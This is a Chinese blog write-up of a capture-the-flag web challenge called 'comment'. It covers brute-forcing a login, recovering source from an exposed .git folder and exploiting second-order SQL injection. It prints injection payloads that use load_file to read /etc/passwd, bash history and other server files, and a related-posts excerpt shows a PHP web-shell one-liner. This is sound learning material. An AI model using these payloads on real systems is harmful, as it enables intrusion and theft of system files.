xctf攻防世界 Web高手进阶区 comment

最新推荐文章于 2024-01-28 14:00:27 发布
最新推荐文章于 2024-01-28 14:00:27 发布
阅读量3.3k 收藏 2
点赞数 3
分类专栏: 攻防世界web之路
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/l8947943/article/details/122349091
版权

前端

1. 进入环境,查看内容

在这里插入图片描述
跳转到login.php
在这里插入图片描述
入手点是想办法登录后,再进行操作。
接下来一顿扫描瞅瞅:在这里插入图片描述

2. 问题分析

  1. 想办法先登入进去
    我们看到文本框提示已经给了zhangwei,密码是zhangwei***,其实就是三位字符补充,在此我们借助burpsuite进行跑字典,如图:
    在这里插入图片描述
    添加payloads,如图:
    在这里插入图片描述
    Start attack!慢慢等吧,巨慢,如图:在这里插入图片描述
    发现当***为666时候请求302了,emmm,走起,如图:
    在这里插入图片描述

  2. 利用.git获取源码
    想到前面dirsearch出来的内容,根据.git提示,果断使用GitHacker搞到源码。
    在这里插入图片描述
    (此处我不理解,为啥我用前端访问就提示没有权限,而用githack就能下载下来,什么原理?)

  3. 分析代码
    在这里插入图片描述
    这一段代码啥啊,乱七八糟的没有一点入手地方。。。卡壳了,看看大佬们的writeup吧,发现这道题考察的是git泄露和恢复,所以还是需要一些基本的git知识的。(但是我尝试用git恢复死活出不来当初的版本,还老是飘红,真是醉了,这儿还是参考大神们的搞得代码吧,参考链接:https://blog.csdn.net/hxhxhxhxx/article/details/107937982)

<?php
include "mysql.php";
session_start();
if($_SESSION['login'] != 'yes'){
    header("Location: ./login.php");
    die();
}
if(isset($_GET['do'])){
switch ($_GET['do'])
{
case 'write':
    $category = addslashes($_POST['category']);
    $title = addslashes($_POST['title']);
    $content = addslashes($_POST['content']);
    $sql = "insert into board
            set category = '$category',
                title = '$title',
                content = '$content'";
    $result = mysql_query($sql);
    header("Location: ./index.php");
    break;
case 'comment':
    $bo_id = addslashes($_POST['bo_id']);
    $sql = "select category from board where id='$bo_id'";
    $result = mysql_query($sql);
    $num = mysql_num_rows($result);
    if($num>0){
    $category = mysql_fetch_array($result)['category'];
    $content = addslashes($_POST['content']);
    $sql = "insert into comment
            set category = '$category',
                content = '$content',
                bo_id = '$bo_id'";
    $result = mysql_query($sql);
    }
    header("Location: ./comment.php?id=$bo_id");
    break;
default:
    header("Location: ./index.php");
}
}
else{
    header("Location: ./index.php");
}
?>

这段代码能看出来其实是考察sql的注入知识,核心内容其实在下面这段代码:

 $sql = "insert into comment
            set category = '$category',
                content = '$content',
                bo_id = '$bo_id'";

当登录后要发帖子时候,我们执行的sql语句是这段,但是我们可与看到每一段sql都是用另起一行,且可与看到category 并没有被过滤,而且页面上的帖子,content是可以被回显出来的,因此此题的突破口在这个点,看了好多博客,都没有说明为什么。尝试利用category去覆盖原有的content,因此才有了网上所谓的解释如何执行sql语句的代码,#只能注释同一行,这里需要注释/**/来进行两行的注释:

$sql = "insert into comment
            set category = '123',content=user(),/*',
                content = '*/#',
                bo_id = '$bo_id'";
  1. 如何构造payload
    上述代码提示我们需要在前端去如何填写,找了很多网上的帖子讲得好粗略,而且没有实操过程,遂做详细记录。因此构造payload如图:
    在这里插入图片描述

提交后,点击详情,发布提交,如图,会回显ctf
在这里插入图片描述
也就是说我们的sql语句闭合了,而且注入正确。接下来就是跟着wp走了,我很多也看不懂,先做记录吧!
接着构造payload:1’,content=user(),/*,回显如图:
在这里插入图片描述
同样道理,以*/#进行闭合,后面一直是这么操作。如图:
在这里插入图片描述
查看了当前用户为root用户,好家伙,权限很高嘛
接着构造payload:1’,content=(select(load_file(’/etc/passwd’))),/*,回显如图:
在这里插入图片描述

可以看到www用户使用了bash操作
接着构造payload:1’,content=(select(load_file(’/home/www/.bash_history’))),/*,回显如图:在这里插入图片描述
记录了用户的操作历史,可以看到用户进入了/tmp文件夹并解压了html.zip,接着做了一份拷贝,并删除了.DS_Store文件,这个文件是数据文件,对于内容十分重要,但由于内容大,前端显示不完全,因此网上wp都采用了十六进制回显:
接着构造payload: 1’,content=(select(hex(load_file(’/tmp/html/.DS_Store’)))),/*,回显如图:在这里插入图片描述
我们将数据拷贝出来,并使用在线十六进制转字符进行翻译,如图:
在这里插入图片描述
可以看到我们要找的flag文件是:flag_8946e1ff1ee3e40f.php
接着构造payload:1’,content=select(hex(load_file(’/var/www/html/flag_8946e1ff1ee3e40f.php’)))),/*,回显如图:
在这里插入图片描述
同样将其拷贝并翻译,得到最终的结果,如图:
在这里插入图片描述
这个题flag是动态的,因此需要一步步操作实践。

3. 反思

算了不反思了,天天被虐,太菜。
题目也算做到了现在,真的好难,我也不知道自己还能坚持多久,这个题研究花费了两天多时间才整理完,也算努力过了。欢迎留言交流讨论!

l8947943
关注
  • 3
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 12
    评论
专栏目录
攻防世界 web进阶笔记
weixin_43928140的博客
06-03 1830
0x02 NaNNaNNaNNaN-Batman 首先下载附件得到web100,用notepad++打开看下,是一些js乱码 我把源码贴到下面 <script>_='function $(){e=getEleById("c").value;length==16^be0f23233ace98aa$c7be9){tfls_aie}na_h0lnrg...
xctfcomment,git泄露git修复
qq_39167911的博客
03-24 524
dirsearch -u发现git目录,burpsuit的spider爬虫发现login等目录 githacker拿源码 sudo pip3 install GitHacker //创建软连接放到 /usr/bin 或者 /usr/sbin 目录下 cd /usr/sbin sudo ln -s /home/<用户名>/.local/bin/githacker //添加到环境变量中 sudo vi /etc/profile :/home/<用户名>/.loca
CTF_comment_git库泄露&&二次注入_wp
shelter1234567的博客
05-20 470
git是一个开源的分布式版本控制系统,用于敏捷高效地处理任何或小或大的项目。当前大量开发人员使用git进行版本控制,对站点自动部署。如果配置不当,可能会将.git文件夹直接部署到线上环境。这就引起了git泄露漏洞。攻击者可以利用该漏洞下载git文件夹里的所有内容,如果文件内有敏感信息比如站点源码、数据库账户密码等,攻击者可能通过收集到信息攻击该服务器........
攻防世界 comment
CyhDl666的博客
02-26 477
进去是个留言板页面 发帖需要登录 未登录回跳转到登录页面 一不做二不休 直接dirsearch扫描一下 看看有哪些文件 芜湖!意外发现git泄露!! 还扫到了个mysql.php???访问好像没啥子用 以后再说 GitHack 下载了一下 发现只下载了给write_do.php 代码贴下 <?php include "mysql.php"; session_start(); if($_SESSION['login'] != 'yes'){ header("Location: ./log.
攻防世界-comment
xixihahawuwu的博客
12-15 213
一个留言板扫描目录,发现存在login.php界面。访问 给了我们一个并不完整的登录信息 爆破得到后三位密码666登录成功后发现返回之前的首页 根据题目描述,存在sql注入 扫描目录 发现存在git源码泄露 扒取源码发现write_do.php文件没有什么信息 检查页面元素时发现我们得到的码是不完整的,需要修复 修复完的源码如下: <?php include "mysql.php"; session_start(); if($_SESSION['login'] != 'yes'){ hea
攻防世界高手进阶Web comment
weixin_43093631的博客
06-09 1477
攻防世界高手进阶Web comment 这题我在网上没找到Writeup,所有花了8金币买的。 这题主要考点 爆破 git泄露 代码审计 SQL注入 可以看到账号框账号为:zhangwei 密码为zhangwei*** 所以需要爆破zhangwei后面的三位数,我当时没想到这点看wp才明白的 user:zhangwei pass:zhangwei666 然后扫描目录的时候发现.git文件然后应该是有git源码泄露,过扫描发现到一个write_do.php文件 登陆成功后看到可以发帖加上题目提示sql,
XCTF攻防世界web.doc
09-19
XCTF攻防世界Web WriteUp】 在网络安全竞赛中,CTF(Capture The Flag)是一种常见的形式,其中“XCTF攻防世界”是一个专注于Web安全的平台,旨在帮助参与者提升网络安全技能,特别是Web应用的安全防御和攻击能力...
XCTF-RE】新手练习-logmein
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/ez5t60
XCTF-RE】新手练习-maze
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/fr45py
XCTF-RE】新手练习-insanity
08-03
题目:https://adworld.xctf.org.cn/task/task_list?type=reverse&number=4&grade=0&page=1 我的解题记录:https://www.yuque.com/jianouzuihuai/study/siwtcm
XCTF mfc逆向-200
12-22
查壳 vmp。。。 看了大佬博客后得知解法 这是一个MFC程序,但我不会。。。...但是我知道mfc的程序应该都是一个个控件组成 ...发现这两个东西,第一个是窗口类名,第二个我也不晓得是啥,但是它比前面和后面的少了一个消息...
XCTF - web - wp1 (不定期整理)
weixin_42444939的博客
09-06 672
upload ( RCTF - 2015 ) 一进入靶场有个登陆注册(看上去像是二次注入,算辽先忍住骚操作,老老实实按部就班) 于是得到下面的上传文件界面: 结合题目upload,自然按照文件上传漏洞往下做 这里用我最常用的php一句话进行挂小马尝试: <?= $fun = base64_decode($_REQUEST['fun']); $arr = array($_POST['...
ctf-wp-comment
dahege666的博客
12-18 540
Comment是代表去添加一些评论或者注释 描述中说“程序员GIT写一半跑路了,没来得及Commit”,这是很明显的一个提示 git stash恢复: 最常用的就是使用git clone把github上的源码下载下来,在实际上当你把代码提交给github时是分为两个步骤的:一个git add,另一个是git commit。 在git工具里存在一个缓存stage,当在工作写完代码后,首先是使用git add,就是把修改后的代码放到了stage缓存,但是修改之前的代码也是可以找打...
XCTF ics-05
小白渣的博客
10-01 573
题目来源 攻防世界web高手进阶ics-05(XCTF 4th-CyberEarth) 1.拿到题目以后,发现是一个index.php的页面,并且设备…没有显示完全,此位置可疑。 2.源代码中发现?page=index,出现page这个get参数,联想到可能存在文件包含读源码的漏洞,尝试读取index.php的页面源码 通过php内置协议直接读取代码 /index.php?page=php://...
CTF训练STEGA题目-数独
qq_30167299的博客
05-12 5563
看到这名字,还以为要解数独。。。下载文件,解压出来好多数独...想起那句话,没有无缘无故的信息。那么可以推测,flag应该藏在全部的数独中,每个数独仅仅包含一部分信息。但?这是普通的数独,能有什么信息?最多就是数独排列不同。忽然发现,会不会是那些数字组成的形状,细看1.png,5.png,21.png.这不就是二维码的定位形状吗?这些数独图片可以组成二维码。需要将图片1.png,5.png,21....
XCTF高手进阶web5_supersqli writeup(新)
Mitchell_Donovan的博客
02-04 1123
web5_supersqli 原题链接 key:SQL堆叠注入 ①题目打开后是这个样子的???? 再根据题目描述???? 大概率是道SQL注入题 ②像bkctf里的那道SQL注入题一样 先把默认的inject=1提交一下 提交inject=1'回显错误,猜测是单引号闭合 提交inject=1'#回显正常,说明是单引号闭合 ③一样的操作,用order by判断联合注入的字段数 提交inject=1' order by 2#,回显正常 提交inject=1
攻防世界web进阶comment详解
hxhxhxhxx的博客
08-11 1431
攻防世界web进阶comment详解题目详解cp:.DS_Store 题目 详解 只要我们输入任何一个评论,他就会让我们进行登录, 我们可以通过他的文字提示,发现少了三位,一般我们都会上数字 我们发现他666的时候有一个302的跳转 登录以后,感觉也没有什么可以注入的 正常也没有回显,这时候,我们的御剑传来了好消息 有个.git,应该是git源码泄露。使用githack 下载源代码。 <?php include "mysql.php"; session_start(); if($_SESS
攻防世界comment
qq_44065556的博客
09-16 464
刚进入看见画面 然后发现页面需要登录 输入框似乎给了提示 burp抓取 弱口令爆破 从爆破情况来看 密码应该是zhangwei666 登录后也没发现什么可以注入 也没有什么变化 习惯性的用dirsearch 扫一下 可以看到.git出现了 那应该是git源码泄露了, 用githack抓下来 我们查看我们抓下来的文件 可以判断 他的源码不完整 缺失了 用脚本给它补上 参考 -> CTF中的git泄露题目 - Tkitn - 博客园 ...
攻防世界-WEB-comment
最新发布
m0_52061428的博客
01-28 1519
write’操作将用户通过POST方法提交的数据插入到名为’board’的数据库表中,而’comment’操作将用户通过POST方法提交的评论数据插入到名为’comment’的数据库表中。而在comment中,由于他并未对category使用这个函数,原因可能是在comment.php中,我们并不能直接使用category。也就是说,我们可以通过查看www的历史记录以获取一些关键信息,这里我们需要知道的是flag在哪里。一般来说,bash的历史记录保存在home/用户/.bash_history中。
攻防世界traffic
07-28
- *1* *2* [xctf攻防世界 Web高手进阶 easytornado](https://blog.csdn.net/l8947943/article/details/126174257)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 12
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

l8947943

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值